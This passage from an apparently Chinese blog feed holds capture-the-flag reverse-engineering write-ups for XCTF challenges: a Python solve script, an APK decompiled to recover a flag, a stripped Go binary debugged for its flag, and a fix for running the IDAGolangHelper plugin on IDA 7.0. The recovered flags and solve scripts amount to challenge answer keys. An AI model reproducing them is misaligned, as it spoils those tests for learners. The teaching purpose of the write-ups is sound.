&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0A2D,&nbsp;0x764A,&nbsp;0x609E,&nbsp;0xE8B6,&nbsp;0xEA68,&nbsp;0x2524,&nbsp;0xE6BB,&nbsp;0x7C9C,&nbsp;0x639F,&nbsp;0x3A95,&nbsp;0x0895,&nbsp;0xF40F,&nbsp;0x8328,&nbsp;0xEA69, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x7EE5,&nbsp;0xF8BD,&nbsp;0x7F7D,&nbsp;0x0D6D,&nbsp;0x70B6,&nbsp;0x458C,&nbsp;0xE8B6,&nbsp;0xEA68,&nbsp;0x251C,&nbsp;0x6065,&nbsp;0xB35F,&nbsp;0xC789,&nbsp;0x5845,&nbsp;0x7F7D, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x6D89,&nbsp;0x4C6E,&nbsp;0xA20E,&nbsp;0x60B5,&nbsp;0x7E45,&nbsp;0xED59,&nbsp;0xF707,&nbsp;0x69EF,&nbsp;0x922A,&nbsp;0x4BC5,&nbsp;0xF6EF,&nbsp;0x8635,&nbsp;0xF4B9,&nbsp;0x57B4, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x7CF8,&nbsp;0xED60,&nbsp;0x2510,&nbsp;0x095D,&nbsp;0x20AF,&nbsp;0x3545,&nbsp;0xF40F,&nbsp;0x8328,&nbsp;0xEA41,&nbsp;0x58A4,&nbsp;0x225D,&nbsp;0x7E7C,&nbsp;0x4BDB,&nbsp;0xF8BD, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x082C,&nbsp;0xEAE7,&nbsp;0x5D57,&nbsp;0x5D50,&nbsp;0x0914,&nbsp;0xE7C7,&nbsp;0x8624,&nbsp;0x7CF8,&nbsp;0xED60,&nbsp;0x2511,&nbsp;0x7C8E,&nbsp;0x7159,&nbsp;0x8416,&nbsp;0x7EF9, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xE7E5,&nbsp;0x774A,&nbsp;0x3895,&nbsp;0x1EC9,&nbsp;0x7C90,&nbsp;0x09B9,&nbsp;0x58BD,&nbsp;0x5FF5,&nbsp;0xE99E,&nbsp;0xEA68,&nbsp;0x250A,&nbsp;0x224C,&nbsp;0xEA3D,&nbsp;0x73F5, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x7C89,&nbsp;0x53A6,&nbsp;0x3190,&nbsp;0x3B5D,&nbsp;0x1526,&nbsp;0x7DD5,&nbsp;0x666A,&nbsp;0x0919,&nbsp;0x225F,&nbsp;0xCDEF,&nbsp;0x79E1,&nbsp;0x7E7B,&nbsp;0x7E6B,&nbsp;0x082C, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xA277,&nbsp;0xE885,&nbsp;0xE8BB,&nbsp;0xE775,&nbsp;0x5FF7,&nbsp;0xEA68,&nbsp;0x251B,&nbsp;0x7FDF,&nbsp;0x589D,&nbsp;0x7A05,&nbsp;0x779A,&nbsp;0x8A5A,&nbsp;0x7C91,&nbsp;0x5D5C, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x32ED,&nbsp;0xF628,&nbsp;0x2195,&nbsp;0xF49A,&nbsp;0x0C77,&nbsp;0xEAE1,&nbsp;0x59B9,&nbsp;0x58BD,&nbsp;0xE570,&nbsp;0xE99E,&nbsp;0xEA3D,&nbsp;0x73F9,&nbsp;0x13AD,&nbsp;0x2BF5, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x225D,&nbsp;0x7F7D,&nbsp;0x70B6,&nbsp;0x4A9C,&nbsp;0x337A,&nbsp;0x1EC9,&nbsp;0x4D05,&nbsp;0x7E75,&nbsp;0x2578,&nbsp;0xED59,&nbsp;0x38E5,&nbsp;0x1ECA,&nbsp;0xA210,&nbsp;0x3B5D, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x779A,&nbsp;0x8A6F,&nbsp;0xC790,&nbsp;0x2518,&nbsp;0x4B41,&nbsp;0x7C89,&nbsp;0x5D49,&nbsp;0x4D05,&nbsp;0x152D,&nbsp;0x73C5,&nbsp;0x79F9,&nbsp;0x4BED,&nbsp;0x913C,&nbsp;0x37C9, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x5D4D,&nbsp;0x53C8,&nbsp;0x0941,&nbsp;0x7C97,&nbsp;0x5D5B,&nbsp;0x346A,&nbsp;0x82D8,&nbsp;0x5F36,&nbsp;0x801F,&nbsp;0xC800] arr3&nbsp;=&nbsp;[] for&nbsp;i&nbsp;in&nbsp;arr2: &nbsp;&nbsp;&nbsp;&nbsp;arr3.append(i&nbsp;/&nbsp;1600) &nbsp;&nbsp;&nbsp;&nbsp;arr3.append((i&nbsp;/&nbsp;40)&nbsp;%&nbsp;40) &nbsp;&nbsp;&nbsp;&nbsp;arr3.append(i&nbsp;%&nbsp;40) i&nbsp;=&nbsp;0 flag&nbsp;=&nbsp;[] while&nbsp;i&nbsp;&lt;&nbsp;len(arr3): &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;arr3[i]&nbsp;==&nbsp;39: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag.append(ctable[arr3[i&nbsp;+&nbsp;1]&nbsp;+&nbsp;39]) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;2 &nbsp;&nbsp;&nbsp;&nbsp;else: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag.append(ctable[arr3[i]]) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;1 s&nbsp;=&nbsp;&quot;&quot; for&nbsp;n&nbsp;in&nbsp;flag: &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;n&nbsp;!=&nbsp;0x00: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s&nbsp;+=&nbsp;chr(n) print&nbsp;s #print&nbsp;hashlib.md5(s).hexdigest()</pre><pre class="prism-highlight prism-language-bash">$&nbsp;./solve.py Milos&nbsp;Raonic&nbsp;(born&nbsp;1990)&nbsp;is&nbsp;a&nbsp;Canadian&nbsp;professional&nbsp;tennis&nbsp;player.&nbsp;He&nbsp;reached&nbsp;a&nbsp;career&nbsp;high&nbsp;world&nbsp;No.&nbsp;4&nbsp;singles&nbsp;ranking&nbsp;in&nbsp;May&nbsp;2015,&nbsp;as&nbsp;ranked&nbsp;by&nbsp;the&nbsp;Association&nbsp;of&nbsp;Tennis&nbsp;Professionals&nbsp;(ATP).&nbsp;His&nbsp;career&nbsp;highlights&nbsp;include&nbsp;a&nbsp;Grand&nbsp;Slam&nbsp;final&nbsp;at&nbsp;the&nbsp;2016&nbsp;Wimbledon&nbsp;Championships&nbsp;and&nbsp;two&nbsp;Grand&nbsp;Slam&nbsp;semifinals&nbsp;at&nbsp;the&nbsp;2014&nbsp;Wimbledon&nbsp;Championships&nbsp;and&nbsp;2016&nbsp;Australian&nbsp;Open.&nbsp;He&nbsp;was&nbsp;the&nbsp;2011&nbsp;ATP&nbsp;Newcomer&nbsp;of&nbsp;the&nbsp;Year,&nbsp;and&nbsp;has&nbsp;been&nbsp;ranked&nbsp;continuously&nbsp;inside&nbsp;the&nbsp;top&nbsp;20&nbsp;since&nbsp;August&nbsp;2012.&nbsp;Raonic&nbsp;is&nbsp;the&nbsp;first&nbsp;player&nbsp;born&nbsp;in&nbsp;the&nbsp;1990s&nbsp;to&nbsp;win&nbsp;an&nbsp;ATP&nbsp;title,&nbsp;to&nbsp;be&nbsp;ranked&nbsp;in&nbsp;the&nbsp;top&nbsp;10,&nbsp;and&nbsp;to&nbsp;qualify&nbsp;for&nbsp;the&nbsp;ATP&nbsp;World&nbsp;Tour&nbsp;Finals.&nbsp;He&nbsp;has&nbsp;eight&nbsp;ATP&nbsp;singles&nbsp;titles,&nbsp;all&nbsp;won&nbsp;on&nbsp;hard&nbsp;courts.&nbsp;He&nbsp;is&nbsp;frequently&nbsp;described&nbsp;as&nbsp;having&nbsp;one&nbsp;of&nbsp;the&nbsp;best&nbsp;serves&nbsp;among&nbsp;his&nbsp;contemporaries.&nbsp;Statistically,&nbsp;he&nbsp;is&nbsp;among&nbsp;the&nbsp;strongest&nbsp;servers&nbsp;in&nbsp;the&nbsp;Open&nbsp;Era,&nbsp;winning&nbsp;91p&nbsp;of&nbsp;service&nbsp;games&nbsp;to&nbsp;rank&nbsp;third&nbsp;all&nbsp;time.&nbsp;Aided&nbsp;by&nbsp;his&nbsp;serve,&nbsp;he&nbsp;plays&nbsp;an&nbsp;all&nbsp;court&nbsp;style&nbsp;with&nbsp;an&nbsp;emphasis&nbsp;on&nbsp;short&nbsp;points. $&nbsp;./solve.py&nbsp;|&nbsp;md5sum&nbsp;|&nbsp;awk&nbsp;&#39;{print&nbsp;$1}&#39; 2c8cd31daeba8753815851f13e6370b3</pre><p><br/></p>Sat, 09 May 2020 10:51:26 +0800攻防世界 XCTF Reverse What-does-this-button-do Writeup(apk反编译)http://www.liugongrui.com/?id=256<p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586488891408476.png" alt="image.png"/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586488908623899.png" alt="image.png"/></p><p>修改成。zip打开后发现是apk,修改成apk,使用jeb3直接打开反编译</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586488962447047.png" alt="image.png"/></p><p>输入EYG3QMCS可以执行flag.class</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586488997506005.png" alt="image.png"/></p><pre class="prism-highlight prism-language-python">arr&nbsp;=&nbsp;[102,&nbsp;108,&nbsp;97,&nbsp;103,&nbsp;0x7B,&nbsp;0x77,&nbsp;52,&nbsp;110,&nbsp;110,&nbsp;52,&nbsp;0x5F,&nbsp;106,&nbsp;52,&nbsp;0x72,&nbsp;0x5F,&nbsp;109,&nbsp;0x79,&nbsp;0x5F,&nbsp;100,&nbsp;51,&nbsp;120,&nbsp;0x7D] flag&nbsp;=&nbsp;&#39;&#39; for&nbsp;i&nbsp;in&nbsp;arr: &nbsp;&nbsp;&nbsp;&nbsp;flag&nbsp;+=&nbsp;chr(i) print&nbsp;flag #flag{w4nn4_j4r_my_d3x}</pre><p>提交的时候去掉flag{}<br/></p>Fri, 10 Apr 2020 11:20:56 +0800攻防世界 XCTF Reverse easy_go Writeup(go语言逆向)http://www.liugongrui.com/?id=255<p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481309516304.png" alt="image.png"/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481356337225.png" alt="image.png"/></p><p>ida打开,函数太多了,看起来都是无用的函数,搜索才知道这是去符号表后的go语言,所以需要恢复符号表,才能看到正常的代码</p><p>恢复符号表看&nbsp;<a href="http://www.liugongrui.com/?id=254">http://www.liugongrui.com/?id=254</a>&nbsp;这个文章</p><p>恢复之后主函数是这样的 main_main</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481549203731.png" alt="image.png"/></p><p>可以看到有个base64decode<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481582344481.png" alt="image.png"/></p><p>在这打个断点,使用远程调试</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481852746207.png" alt="image.png"/></p><p>断下之后按F8执行过去,双击a2进去</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586481975257065.png" alt="image.png"/></p><p>可以看到flag<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/04/202004101586482005748917.png" alt="image.png"/></p><p>flag{92094daf-33c9-431e-a85a-8bfbd5df98ad}</p><p><br/></p>Fri, 10 Apr 2020 09:14:25 +0800IDA 7.0 如何使用 IDAGolangHelper插件http://www.liugongrui.com/?id=254<h1 style="box-sizing: border-box; outline: 0px; margin: 8px 0px 16px; padding: 0px; font-size: 28px; font-family: &quot;Microsoft YaHei&quot;, &quot;SF Pro Display&quot;, Roboto, Noto, Arial, &quot;PingFang SC&quot;, sans-serif; color: rgb(79, 79, 79); line-height: 36px; overflow-wrap: break-word; font-variant-ligatures: common-ligatures; white-space: normal; background-color: rgb(255, 255, 255);">Background</h1><p style="box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-family: &quot;Microsoft YaHei&quot;, &quot;SF Pro Display&quot;, Roboto, Noto, Arial, &quot;PingFang SC&quot;, sans-serif; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow-wrap: break-word; font-variant-ligatures: common-ligatures; white-space: normal; background-color: rgb(255, 255, 255);">现在时间是2020年4月10日 星期5<br style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; overflow-wrap: break-word;"/>IDA插件<a href="https://github.com/sibears/IDAGolangHelper" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(103, 149, 181); text-decoration-line: none; cursor: pointer; background-color: transparent; overflow-wrap: break-word;">地址</a><br style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; overflow-wrap: break-word;"/>在windows 上使用 IDA Pro 7.0</p><h1 style="box-sizing: border-box; outline: 0px; margin: 8px 0px 16px; padding: 0px; font-size: 28px; font-family: &quot;Microsoft YaHei&quot;, &quot;SF Pro Display&quot;, Roboto, Noto, Arial, &quot;PingFang SC&quot;, sans-serif; color: rgb(79, 79, 79); line-height: 36px; overflow-wrap: break-word; font-variant-ligatures: common-ligatures; white-space: normal; background-color: rgb(255, 255, 255);"><a name="t1" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a><a name="t1" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a><a id="_5" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a>问题</h1><p style="box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-family: &quot;Microsoft YaHei&quot;, &quot;SF Pro Display&quot;, Roboto, Noto, Arial, &quot;PingFang SC&quot;, sans-serif; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow-wrap: break-word; font-variant-ligatures: common-ligatures; white-space: normal; background-color: rgb(255, 255, 255);">由于现在IDAGolangHelper支持IDA Pro 7.4,可能对低版本的IDAPython支持不太友好。由于某些问题(qiong),无法更换到最新IDA版本,因此要想在IDAPro7.0上使用这个插件,需要进行一些代码上的修改。</p><h1 style="box-sizing: border-box; outline: 0px; margin: 8px 0px 16px; padding: 0px; font-size: 28px; font-family: &quot;Microsoft YaHei&quot;, &quot;SF Pro Display&quot;, Roboto, Noto, Arial, &quot;PingFang SC&quot;, sans-serif; color: rgb(79, 79, 79); line-height: 36px; overflow-wrap: break-word; font-variant-ligatures: common-ligatures; white-space: normal; background-color: rgb(255, 255, 255);"><a name="t2" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a><a name="t2" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a><a id="Solution_9" style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; color: rgb(78, 161, 219); cursor: pointer; background-color: transparent; overflow-wrap: break-word;"></a>Solution</h1><ol style="list-style-type: none;" class=" list-paddingleft-2"><li><p>下载项目&nbsp;<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">git clone https://github.com/sibears/IDAGolangHelper</code></p></li><li><p>修改文件&nbsp;<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">GO_Utils/__init__.py</code>,将第16行<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">self.bt_obj = Utils.get_bitness(ida_ida.inf_get_min_ea())</code>替换为<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">self.bt_obj = Utils.get_bitness(idc.BeginEA())</code></p></li><li><p>如果仍然不行,继续修改文件&nbsp;<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">GO_Utils/Gopclntab.py</code>, 在31行<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">while possible_loc != idc.BADADDR:</code>下面<span style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 0px; overflow-wrap: break-word;text-decoration:underline;">增加</span>一行<code style="box-sizing: border-box; outline: 0px; margin: 0px; padding: 2px 4px; font-family: &quot;Source Code Pro&quot;, &quot;DejaVu Sans Mono&quot;, &quot;Ubuntu Mono&quot;, &quot;Anonymous Pro&quot;, &quot;Droid Sans Mono&quot;, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, &quot;PingFang SC&quot;, &quot;Microsoft YaHei&quot;, sans-serif; font-size: 14px; line-height: 22px; color: rgb(199, 37, 78); background-color: rgb(249, 242, 244); border-radius: 2px; overflow-wrap: break-word;">return possible_loc</code></p></li><li><p>使用IDA-&gt;File-&gt;Script File 打开IDAGolangHelper项目中的go_entry.py。</p></li><li><p>选择Go版本(默认1.2),点击Rename functions</p></li><li><p>大功告成</p></li></ol><p><br/></p>Fri, 10 Apr 2020 09:11:26 +0800